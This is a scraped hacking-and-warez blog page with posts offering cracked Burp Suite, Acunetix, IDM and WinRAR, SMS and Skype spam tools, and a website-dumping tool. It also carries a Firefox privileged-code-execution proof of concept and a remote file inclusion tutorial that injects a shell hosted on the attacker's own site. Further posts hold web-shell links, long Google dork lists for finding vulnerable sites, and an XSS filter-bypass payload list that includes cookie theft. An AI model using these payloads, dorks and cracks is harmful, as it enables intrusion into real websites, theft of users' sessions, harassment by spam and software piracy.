22:54
22:50
Download Burp suit 2020.7
jack sparrow
No comments
Download Burp suit 2020.7
1. burp/StartBurp has been compiled by a new version of the Java Runtime (class file version 53.0).
You need to use java9+
2. Place the 2 files in the same directory, then run:
if Windows:
"C:\Program Files\Java\jdk-13.0.2\bin\java.exe" --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.7.jar -noverify -jar burpsuite_pro_v2020.7.jar
if Linux:
/usr/lib/jvm/java-11-openjdk-amd64/bin/java --illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.7.jar -noverify -jar burpsuite_pro_v2020.7.jar
3. If you have problems with activate license, you should use to do it old burploader (for older versions like 2.1.07). Then load newest version BurpLoader to run current burpsite_pro.jar
P.S.: There we use the same loader as in 2020.4 version (https://github.com/x-Ai/BurpSuiteLoader).
![]() |
21:12
How to change Boot Animation or Logo in Linux Mint 19.1 Cinnamon
changing Boot Animation Logo in Linux Mint 19.1 Cinnamon
open your terminal and go to following path
/usr/share/plymouth/themes/mint-logo
or you can directly open open folder as Root
replace mint-logo.png as your desire logo image
in case of your image size is large you can reduce it's size or simply resize it online https://resizeimage.net/
open terminal and run following command
chmod 644 mint-logo.png
sudo update-initramfs -u
Now reboot your system :D
open your terminal and go to following path
/usr/share/plymouth/themes/mint-logo
or you can directly open open folder as Root
replace mint-logo.png as your desire logo image
in case of your image size is large you can reduce it's size or simply resize it online https://resizeimage.net/
open terminal and run following command
chmod 644 mint-logo.png
sudo update-initramfs -u
Now reboot your system :D
22:07
13 TB collections, you might require
jack sparrow
No comments
BOOKMARK THIS
Google drive movies - https://drive.google.com/ drive/u/0/mobile/folders/ 0B6FjKMQKynZILTlwZHl4ajUwcFU
Programming language collection on google drive - https://drive.google.com/ drive/folders/0ByWO0aO1eI_ MN1BEd3VNRUZENkU
Books -
Google drive hacking ebook collection - https://drive.google.com/ drive/folders/0B- JzQsKoJaANbTFGN0RWLWhONms
Books for reading - https://drive.google.com/ drive/folders/ 0B09qtt10aqV1SGxRVXBWYmNIS2M
Books (novels) - https://drive.google.com/ drive/folders/ 0B1v9Iy1jH3FXdlNDeUNHNEVsZlE
C programming tutorial google drive - https://drive.google.com/ drive/folders/ 0B1qoi1IlEKwaM2tSMFBmOGUyNzg
Udemy course google drive link - https://drive.google.com/ drive/folders/ 0B1HQDi7EkA9XNlR3STF5SVJIVUk
Programming books google drive - https://drive.google.com/ drive/folders/0B2iEK7PB5AR- b01obXBHWHVHQzg
4K wallpaper google drive - https://drive.google.com/ drive/folders/ 0Bx2Vez2N3qd7SGxkejRhQmdKQlk
Books for reading - https://drive.google.com/ drive/folders/0B_ qpgvDTe8kraTQ2QkM2S19tQWs
Best collection google drive - https://drive.google.com/ drive/folders/ 0B3Qd1rlyIyR5bHo0dENpM1lSclk
Banking exam preparation papers - https://drive.google.com/ drive/folders/ 0B079Cm0MfQeyS3R5cHVnb2RVUU0
Learning awareness banking lecture - https://drive.google.com/ drive/folders/ 0B8CnCCd60bnzM3VSWFhKZ2Rzc2s
Head first programming book collection - https://drive.google.com/ drive/folders/ 0B1W3DeV5S5BELXZRajkteW83WHM
IBPS book collection for banking - https://drive.google.com/ drive/folders/ 0B4xFnW1qvXXgZnVkaUVEX2w4Zzg
Reading material - https://drive.google.com/ drive/folders/0Bx_ 3I5qjqu3rSVBWMHpjLVRoREE
300 medical books - https://drive.google.com/ drive/folders/ 0BzQUrkcZOjAiYmQ0NTBjZmMtMDJjM S00OWViLTk0NWEtYTFhYzE2ZTZmYzd k
[Udemy] the complete digital marketing course - https://drive.google.com/ drive/folders/0B- M90IqpPfRHNXZ6SkdMQlZOUkk
Arduino step by step - https://drive.google.com/ drive/folders/ 0B0TIoKgqQ9p5WC1pV2I0aHlKamc
All type books - https://drive.google.com/ drive/folders/ 0B1dv5sqSPsPbfk1ZSXNud1pvWl9BV 2Franh2ZFl0S0hweTBhT3QyNFUxWGg zQkFpOGUtd0k
Mechanical engineering books - https://drive.google.com/ drive/folders/ 0B1k2RCDnejGvNFZWTWhJeDctWDQ
English grammer - https://drive.google.com/ drive/folders/0B1_NUA4_ UggJYUIwc09LX1dfcDA
GMAT, GRE, TOEFL, IELTS & LSAT - https://drive.google.com/ drive/folders/ 0B2jZERjUXCHhZnB5T0tpY2ZyRmc
Html essential training - https://drive.google.com/ drive/folders/ 0B3LfaGUUk6tiT18xZDRBY1FCVXc
Php development course - https://drive.google.com/ drive/folders/0ByWO0aO1eI_ MV0lhX1dkUlQ3YUk
Programming books - https://drive.google.com/ drive/folders/0B2iEK7PB5AR- b01obXBHWHVHQzg
02:05
burpsuite_pro_v1.7.30 crack
jack sparrow
brupsuit crack
here you can download latest version of Burpsuite_pro_v1.7.30
Also check out :
Acunetix 11.5 Cracked Web Scanner 2017 Download
00:02
Destroy.Windows.10.Spying Final.Portable tool
This program destroys spying on Windows 7/8/8.1/10.
This program completely destroys spying. Removes some elements of telemetry and the other turns off, disables Windows Defender, Cortana, and much more. As the program disables Windows Update, which allows you to remain anonymous and not to receive updates of new spyware.
The delete Metro applications is very good, because they work in the background, and devour memory, and some of them spying on you.
Also, the program blocks many IP address of Microsoft, which are the data, and adds the most spyware to hosts.
Almost all of the program is irreversible and should not be rolled back even after a system restore point.
At the moment it is the most effective program. The program is developing and improving a large community of users of Windows 10, some help to rewrite the code to a more productive, and some help with the translation of the program into other languages.
Arguments for the command line:
/lang= - set the language of the program starts. Example: /lang=en
/deleteapp= - allows you to delete an application Metro in Windows. Example: /deleteapp=bing or /deleteapp=note
/destroy - an argument for removing spyware.
IMPORTANT! Arguments /destroy and /deleteapp= can not be combined, and the argument /deleteapp= can not be used several times.
1. The program is rewritten from scratch. Its size is reduced.
2. HOSTS forced changes. Problems should not occur.
3. hosts now use ip address 0.0.0.0 .
4. The program creates a system restore point.
5. The settings are divided into 2 types. Professional and normal.
6. Added check is enabled or disabled UAC.
7. A more expanded the Delete menu applications.
8. The utility adds a quick button system recovery.
9. Fix disable windows update.
!!! ATTENTION !!!
SOME OF THIS PROGRAM IRREVERSIBILITY !!!
IF DO NOT KNOW THE MEANING OF SOME FUNCTION, THEN DO NOT ENABLE PROFESSIONAL MODE !!!
password of file= deoffuscated
03:20
Lulzdumper - A web site dumping tool
Terabyte
Hlo friends today i will be sharing my new tool LULZDUMPER
It is tool written in PHP which will help u in zipping all files + db and allows you to download and delete that zip in just one click
01:44
Acunetix 11.5 Cracked Web Scanner 2018 Download
jack sparrow
hacking tool, software, tools
Audit Your Web Security with Acunetix Vulnerability Scanner
technologies including:
- DeepScan Technology – for crawling of AJAX-heavy client-side Single Page Applications (SPAs).
- Industry’s most advanced SQL Injection and Cross-site Scripting testing – includes advanced detection of DOM-based XSS.
- AcuSensor Technology – Combines black box scanning techniques with feedback from its sensors placed inside source code.
support OS
windows XP , windows 7, Windows 8 and Windows 10
Also check out : burpsuite_pro_v1.7.30 crack
password = hacknho
Download 10.5
Download 11.5 (pass- deoffuscated)
Update LInk
02:08
SMS Bomber V1
Terabyte
tools
Hello friends today I am sharing my tool "SMS Bomber"
Features:
Features:
- Dynamic Message Body : You can type what you want to send
- Unlimited number of messages : Send as many messages you want to send
10:51
How Firefox chrome code execution works
jack sparrow
POC
Code execution through javascript: favicons
- Announced
- April 15, 2005
- Reporter
- Michael Krax
- Impact
- Critical
- Products
- Firefox, Mozilla Suite
- Fixed in
- Firefox 1.0.3
- Mozilla Suite 1.7.7
Description
Firefox and the Mozilla Suite support custom "favicons" through the <LINK rel="icon"> tag. If a link tag is added to the page programmatically and a javascript: url is used, then script will run with elevated privileges and could run or install malicious software.Workaround
Disable javascript.PoC Test : Firefox lastest version 51.0.1(32bit)
1. Open new tab (about:newtab)
2. Execute the code below using WebConsole (Hold CTRL+SHIFT+K)
---------------------------------------------------------------
f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()
---------------------------------------------------------------
'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.
Here is an example:
https://www.mozilla.org/en…/security/advisories/mfsa2005-37/
original source:
https://twitter.com/Qab/status/806891824354836480
f=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);f.initWithPath('c:\\Windows\\System32\\cmd.exe');f.launch()
---------------------------------------------------------------
'about:newtab' is considered a chrome privileged page, injecting code within such a context would result in automatic RCE.
Here is an example:
https://www.mozilla.org/en…/security/advisories/mfsa2005-37/
original source:
https://twitter.com/Qab/status/806891824354836480
14:06
Error parsing XML, line 884, column 64: The reference to entity "version" must end with the ';' delimiter
hello friends if you trying to install the FB like box or comment box into your website Here is solution for Error parsing XML, line 884, column 64:The reference to entity "version" must end with the ';' delimiter. when ever you try to inserting the Javascript SDK
Error parsing XML, line 884, column 64: The reference to entity "version" must end with the ';' delimiter.
so here is solution
Enhancement needed to work with the more strict XML checking. This enhancement will allow for the proper escaping of the XML data and commenting the CDATA works for older browsers.
<div id="fb-root"></div>
<script>
/* <![CDATA[ */
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
/* ]]> */
</script>
replace aapId with you appId
<div id="fb-root"></div>
<script>
/* <![CDATA[ */
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3appId=159109061264287";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
/* ]]> */
</script>
<div id="fb-root"></div>
<script>(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.0";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
The following error comes up:Error parsing XML, line 884, column 64: The reference to entity "version" must end with the ';' delimiter.
so here is solution
Enhancement needed to work with the more strict XML checking. This enhancement will allow for the proper escaping of the XML data and commenting the CDATA works for older browsers.
<div id="fb-root"></div>
<script>
/* <![CDATA[ */
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
/* ]]> */
</script>
replace aapId with you appId
<div id="fb-root"></div>
<script>
/* <![CDATA[ */
(function(d, s, id) {
var js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return;
js = d.createElement(s); js.id = id;
js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.3appId=159109061264287";
fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));
/* ]]> */
</script>
00:49
free skype spammer tool download
skype spammer tool is working in windows platform you can run this software with skype and spam on skype user send mass messages and calling flood there is many feature include in it download free from here.
Skype spamer tool includeMassaging
- Message spam
- Mass message
- quote creater
- Auto replay
- call flood
- Auto deny
- Resolver
- Auto accept
- Profile stealer
- Username lookup
- Last online
- online Nuke
- Disco

00:09
RFI-Remote File Inclusion. (Easy and short)
jack sparrow
hacking tutorial
For educational purposes only!
Hellow, leetcoder users.
First of all what do you need.
A vulnerable to RFI site.
(wil be explained detailed in this tutorial.).
A shell. (provided in tutorial.)
This is a very Easy tutorial.
It is easy because RFI is easy.
But do not get me wrong.
finding vulnerables is the hard part!
Since this is a mistake not alot off people make not man sites are vuln to it.
RFI-Remote File Inclusion. (Easy and short) For educational purposes only! Hellow, leetcoder users. First of all what do you need. A vulnerable to RFI site. (wil be explained detailed in this tutorial.). A shell. (provided in tutorial.) This is a very Easy tutorial. It is easy because RFI is easy. But do not get me wrong. finding vulnerables is the hard part! Since this is a mistake not alot off people make not man sites are vuln to it. But why do all the trouble using sqli, xss, lfi, csrf, ssi,.. If this one is so easy. Thats why i make this tutorial. Part 1. Explenation. -- What is RFI -- How to find vulnerables. -- How to test vulnerability. Part 2. exploiting. -- Looking for exploit link. -- ADD your shell. part 3. Downloads. -- Shells. -- Dorks. Part 1. Explenation. Explenation. What is RFI? RFI or remote file inclusion. is a very easy exploiting methode. But it is a very uncommon vulnerability. This gets created by not updating patched or wrongly updating them. So it still happons. Remote file inclusion is exactly what it means. You add (include a file into the directory. remotely.) Explenation. How to find vulnerables. Finding vulnerables is not so different from finding others. We use dorks. But how exactly do we get this vulnerability? Well this is a very simple include file. Code: <?php include($_GET['p'] ?> It sais include ['p'] that means in the link it would be something like this: http://www .[site]. com/index.php?P=travel.php This is importand for our exploit code. later in the tutorial. This could be something else letters, words and so on. example: Code: <?php include($_GET['RealSteel'] ?> We allready know what this means! http://www .[site]. com/index.php?RealSteel=travel.php Its something like ID. no time to explain. To find them? we look for dorks. or we use scanners and so on. same as we do whit sqli ;). Explenation. How to test vulnerability. Easy. we will exploit our full code. Checking vulnerability is literally exploiting it. So we can actually skip this step! ^^. Easy aint it :D. part 2.exploiting. exploiting. Looking for exploit link! simple. change a link like this for example: Code: http://www.[site].com/index.php?x=RealSteel chenge the =realsteel part to a file whe could edit. replace. Which would be the include.php? Code: http://www.[site].com/index.php?x=realpage.php If all good you get no error. because this file is there! we googled it ^^. exploiting. Add your shell. Exploiting, is changing the include whit your shell.txt do not use it as .php or whatever you did. Simple upload a shell and add the link. as following: Code: http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt? Add the question mark at the end!! If you get an error. try changing the exploit link like following: Code: http://www.[site].com/index.php?x=http://www.[MYSITE].com/shell.txt? Watch the at the end. its behind the question mark. Part 3. Downloads. Shells ----------------- PHPJackal Shell < --- http://pastebin.com/rLq3iQEV g00nshell v1.3 Final < --- http://pastebin.com/XdhUJ3t5 Root Shell < --- http://pastebin.com/yuLGFxpF ----------------- Some Dorks : --------- inurl:/modules/My_eGallery/public/displayCategory.php?basepath= inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path= inurl:/include/new-visitor.inc.php?lvc_include_dir= inurl:/_functions.php?prefix= inurl:/cpcommerce/_functions.php?prefix= inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR= inurl:/modules/agendax/addevent.inc.php?agendax_path= inurl:/ashnews.php?pathtoashnews= inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]= inurl:/pm/lib.inc.php?pm_path= inurl:/b2-tools/gm-2-b2.php?b2inc= inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path= inurl:/modules/agendax/addevent.inc.php?agendax_path= inurl:/includes/include_once.php?include_file= inurl:/e107/e107_handlers/secure_img_render.php?p= inurl:/shoutbox/expanded.php?conf= inurl:/main.php?x= inurl:/myPHPCalendar/admin.php?cal_dir= inurl:/index.php/main.php?x= inurl:/index.php?include= inurl:/index.php?x= inurl:/index.php?open= inurl:/index.php?visualizar= inurl:/template.php?pagina= inurl:/index.php?pagina= inurl:/index.php?inc= inurl:/includes/include_onde.php?include_file= inurl:/index.php?page= inurl:/index.php?pg= inurl:/index.php?show= inurl:/index.php?cat= inurl:/index.php?file= inurl:/db.php?path_local= inurl:/index.php?site= inurl:/htmltonuke.php?filnavn= inurl:/livehelp/inc/pipe.php?HCL_path= inurl:/hcl/inc/pipe.php?HCL_path= inurl:/inc/pipe.php?HCL_path= inurl:/support/faq/inc/pipe.php?HCL_path= inurl:/help/faq/inc/pipe.php?HCL_path= inurl:/helpcenter/inc/pipe.php?HCL_path= inurl:/live-support/inc/pipe.php?HCL_path= inurl:/gnu3/index.php?doc= inurl:/gnu/index.php?doc= inurl:/phpgwapi/setup/tables_update.inc.php?appdir= inurl:/forum/install.php?phpbb_root_dir= inurl:/includes/calendar.php?phpc_root_path= inurl:/includes/setup.php?phpc_root_path= inurl:/inc/authform.inc.php?path_pre= inurl:/include/authform.inc.php?path_pre= inurl:index.php?nic= inurl:index.php?sec= inurl:index.php?content= inurl:index.php?link= inurl:index.php?filename= inurl:index.php?dir= inurl:index.php?document= inurl:index.php?view= inurl:*.php?sel= inurl:*.php?session=&content= inurl:*.php?locate= inurl:*.php?place= inurl:*.php?layout= inurl:*.php?go= inurl:*.php?catch= inurl:*.php?mode= inurl:*.php?name= inurl:*.php?loc= inurl:*.php?f= inurl:*.php?inf= inurl:*.php?pg= inurl:*.php?load= inurl:*.php?naam= allinurl:/index.php?page= site:*.dk allinurl:/index.php?file= site:*.dk INURL OR ALLINURL WITH: /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir= /includes/header.php?systempath= /Gallery/displayCategory.php?basepath= /index.inc.php?PATH_Includes= /ashnews.php?pathtoashnews= /ashheadlines.php?pathtoashnews= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /demo/includes/init.php?user_inc= /jaf/index.php?show= /inc/shows.inc.php?cutepath= /poll/admin/common.inc.php?base_path= /pollvote/pollvote.php?pollname= /sources/post.php?fil_config= /modules/My_eGallery/public/displayCategory.php?basepath= /bb_lib/checkdb.inc.php?libpach= /include/livre_include.php?no_connect=lol&chem_absolu= /index.php?from_market=Y&pageurl= /modules/mod_mainmenu.php?mosConfig_absolute_path= /pivot/modules/module_db.php?pivot_path= /modules/4nAlbum/public/displayCategory.php?basepath= /derniers_commentaires.php?rep= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /coppermine/themes/maze/theme.php?THEME_DIR= /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]= /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]= /myPHPCalendar/admin.php?cal_dir= /agendax/addevent.inc.php?agendax_path= /modules/mod_mainmenu.php?mosConfig_absolute_path= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /main.php?page= /default.php?page= /index.php?action= /index1.php?p= /index2.php?x= /index2.php?content= /index.php?conteudo= /index.php?cat= /include/new-visitor.inc.php?lvc_include_dir= /modules/agendax/addevent.inc.php?agendax_path= /shoutbox/expanded.php?conf= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /pivot/modules/module_db.php?pivot_path= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /zentrack/index.php?configFile= /main.php?x= /becommunity/community/index.php?pageurl= /GradeMap/index.php?page= /index4.php?body= /side/index.php?side= /main.php?page= /es/index.php?action= /index.php?sec= /index.php?main= /index.php?sec= /index.php?menu= /html/page.php?page= /page.php?view= /index.php?menu= /main.php?view= /index.php?page= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /content.php?page= /main.php?page= /index.php?x= /main_site.php?page= /index.php?L2= /index.php?show= /tutorials/print.php?page= /index.php?page= /index.php?level= /index.php?file= /index.php?inter_url= /index.php?page= /index2.php?menu= /index.php?level= /index1.php?main= /index1.php?nav= /index1.php?link= /index2.php?page= /index.php?myContent= /index.php?TWC= /index.php?sec= /index1.php?main= /index2.php?page= /index.php?babInstallPath= /main.php?body= /index.php?z= /main.php?view= /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= /index.php?file= /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 1. allinurl:my_egallery site:.org /modules/My_eGallery/public/displayCategory.php?basepath= 2. allinurl:xgallery site:.org /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= 3. allinurl:coppermine site:.org /modules/coppermine/themes/default/theme.php?THEME_DIR= 4. allinurl:4nAlbum site:.org /modules/4nAlbum/public/displayCategory.php?basepath= 5. allinurlP:NphpBB2 site:.org /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= 6. allinurl:ihm.php?p= 7. Keyword : "powered by AllMyLinks" /include/footer.inc.php?_AMLconfig[cfg_serverpath]= 8. allinurl:/modules.php?name=allmyguests /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 9. allinurl:/Popper/index.php? /Popper/index.php?childwindow.inc.php?form= 10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php yahoo = by Kietu? v 3.2 /kietu/index.php?kietu[url_hit]= 11. keyword : "Powered by phpBB 2.0.6" /html&highlight=%2527.include($_GET[a]),exit.%2527&a= 12. keyword : "powered by CubeCart 3.0.6" /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 13. keyword : "powered by paBugs 2.0 Beta 3" /class.mysql.php?path_to_bt_dir= 14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php /ashnews.php?pathtoashnews= 15. keyword : /phorum/login.php /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]= 16. allinurl:ihm.php?p=* 14. keyword : "powered eyeOs" /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id diganti dengan : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d); &a= 15. allinurl:.php?bodyfile= 16. allinurl:/includes/orderSuccess.inc.php?glob= /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]= 17. allinurl:forums.html /modules.php?name= 18. allinurl:/default.php?page=home 19. allinurl:/folder.php?id= 20. allinurl:main.php?pagina= /paginedinamiche/main.php?pagina= 21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests") /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 22. allinurl:application.php?base_path= /application.php?base_path= 23. allinurlp:hplivehelper /phplivehelper/initiate.php?abs_path= 24. allinurlp:hpnuke /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]= 25. key word : "powered by Fantastic News v2.1.2" /archive.php?CONFIG[script_path]= 26. keyword: "powered by smartblog" AND inurl:?page=login /index.php?page= 27. allinurl:/forum/ /forum/admin/index.php?inc_conf= 28. keyword:"Powered By FusionPHP" /templates/headline_temp.php?nst_inc= 29. allinurl:shoutbox/expanded.php filetypep:hp /shoutbox/expanded.php?conf= 30. allinurl: /osticket/ /osticket/include/main.php?config[search_disp]=true&include_dir= 31. keyword : "Powered by iUser" /common.php?include_path= 32. allinurl: "static.php?load=" /static.php?load= 33. keyworld : /phpcoin/login.php /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]= 34. keyworld: allinurl:/phpGedview/login.php site: /help_text_vars.php?dir&PGV_BASE_DIRECTORY= 35. allinurl:/folder.php?id= /classes.php?LOCAL_PATH= inurl:"/lire.php?rub=" inurl:"/os/pointer.php?url=" inurl:"folder.php?id=" inurl:"show.php?page=" inurl:"index2.php?DoAction=" inurl:"index.php?canal=" inurl:"index.php?screen=" inurl:"index.php?langc=" inurl:"index.php?Language=" inurl:"view.php?page=" dork: "powered by doodle cart" rfi of this dork: enc/content.php?Home_Path= dork: "Login to Calendar" rfi of this dork: /embed/day.php?path= dork: "powered by EQdkp" rfi of this dork: /includes/dbal.php?eqdkp_root_path= inurl:"template.php?goto=" inurl:"video.php?content=" inurl:"pages.php?page=" inurl:"index1.php?choix=" inurl:"index1.php?menu=" inurl:"index2.php?ascii_seite=" dork: inurl:surveys rfi to this dork: /surveys/survey.inc.php?path= inurl:"index.php?body=" dork: allinurl:adobt sitel rfi to this dork: /classes/adodbt/sql.php?classes_dir= dork: "Powered By ScozNews" rfi to this dork: /sources/functions.php?CONFIG[main_path]= rfi to this dork: /sources/template.php?CONFIG[main_path]= inurl:"kb_constants.php?module_root_path=" dork: allinurl:"mcf.php" rfi to this dork: /mcf.php?content= dork: inurl:"main.php?sayfa=" rfi to this dork: /main.php?sayfa= dork: "MobilePublisherPHP" rfi to this dork: /header.php?abspath= dork: "powered by phpCOIN 1.2.3" rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]= allinurl:login.php?dir= inurl:"index.php?go=" inurl:"index1.php?=" inurl:"lib/gore.php?libpath=" inurl:"index2.php?p=" inurl:/_functions.php?prefix= inurl:/cpcommerce/_functions.php?prefix=
14:08
WinRAR 4.00 32Bit And 64Bit Full-Version
jack sparrow
software
Download Winrar - the best rar / zip /iso software in the world .
Download once For Life Time .WinRAR archiver is the most powerful tool to process RAR and ZIP files works just fine on windows xp , 7 and 8 pc both 36 bit and 64 bit.its crack licenced for life time.
We will provide download link of Free Full Version For Winrar 5.01.7 latest and best rar soft for Life time free.Download software form link
Download 32 bit win rar
Download 64 bit win rar
22:47
Bypassing the XSS Filters
jack sparrow
hacking tutorial
Bypassing the XSS Filters
Sometimes, website owner use XSS filters(WAF) to protect against XSS vulnerability.
For eg: if you put the <scirpt>alert("hi")</script> , the Filter will escape the "(quote) character , so the script will become.
<script>alert(>xss detected<)</script>
Now this script won't work. Likewise Filters use different type of filtering method to give protection against the XSS. In this case, we can use some tricks to bypass the filter. Here i am going to cover that only.
1.Bypassing magic_quotes_gpc
The magic_quotes_gpc=ON is a PHP setting(configured in PHP.ini File) , it escapes the every ' (single-quote), " (double quote) and \ with a backslash automatically.
For Eg:
<scirpt>alert("hi");</script> will be filtered as <script>alert(\hi\)</script>.so the script won't work now.
we can easily bypass this filter by using ASCII characters instead.
For Eg: alert("hi"); can be converted to
String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)
so it just look like this <script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, 59)</script>
In this case there is no "quotes or 'single quotes or / so the filter can't filter this thing. And, it will successfully run the script.
2.HEX Encoding
we can encode our whole script into HEX code so that it can't be filtered.
For example: <script>alert("Hi");</script> can be convert to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Converting to HEX:
This site will convert to hex code: http://centricle.com/tools/ascii-hex/
3.Bypassing using Obfuscation
Some website admin put the script,alert in restricted word list. so whenever you input this keywords, the filter will remove it and will give error message like "you are not allowed to search this". This can bypassed by changing the case of the keywords(namely Obfuscation).
For eg:
<ScRipt>ALeRt("hi");</sCRipT>
4. Closing Tag
Sometimes putting "> at the beginning of the code will work.
"><script>alert("Hi");</script>
This will end the previous opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q="><script>alert("Ne0");</script>
Some more filter
'"--></style></script><script>alert("XSS")</script>
';alert(String.fromCharCode(88,83,83))//\'";alert(String.fromCharCode(88,83,83))//\"<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'%3Balert(String.fromCharCode(88,83,83))%3B/*
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>&type=all
<script+language%3D'javascript'>alert(document.cookie)<%2Fscript>
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&page=search
">"><%2Fscript><script>alert(String.fromCharCode(88,83,83))%3B<%2Fscript>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>"<'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
"><iframe+onload%3Dalert(%2FXSS%2F)>
-%3E%3Cscript%3Ealert%28XSS%29%3C/script%3E.html
1;i=1;land=1;m=1;oq=<script>alert(%22Ne0%22)</script>
<script>alert(%22Neo%22)</script>
%3Cscript%3Ealert%28%22Neo%22%29%3C%2Fscript%3E
%3Cscript%3Ealert%28%22Neo%22%29%3C%2Fscript%3E
<script>alert(%22gee+wiz%22)</script>&oldqt=<script>alert(%22Deoffuscated%22)</script>
''"><img scr=/ onerror=alert(document.domain)></img>
%3Cscript%3Ealert%28%Neo%%29%3C%2Fscript%3E
09:40
IDM 6.30 Build 10 Crack+Serial Key FREE Download
jack sparrow
software
IDM is the internet download manager. It mean if you went do download any kinds of thing from internet then it software help you. IDM speed up your download then you can easily use this software. If anyone not use idm then then download normaly any kinds of thing its process need to more time to download any kinds things.
Some Serial Number IDM 6.30 Build 10
patebinlink
How you active 6.30 Build 10 version in your PC??
First download idm our link.
Then unrar this software.
You can find 2 folder first one is setup other one is activator.
So install idm new version setup file.
When setup finish then just double click idm activator.
Now you can see magic you got full features of this software.
JUST ENJOY!!!!
Download only crack
08:54
skiper_by_-neo-seesor_v1.4
Subscribe to:
Posts (Atom)






















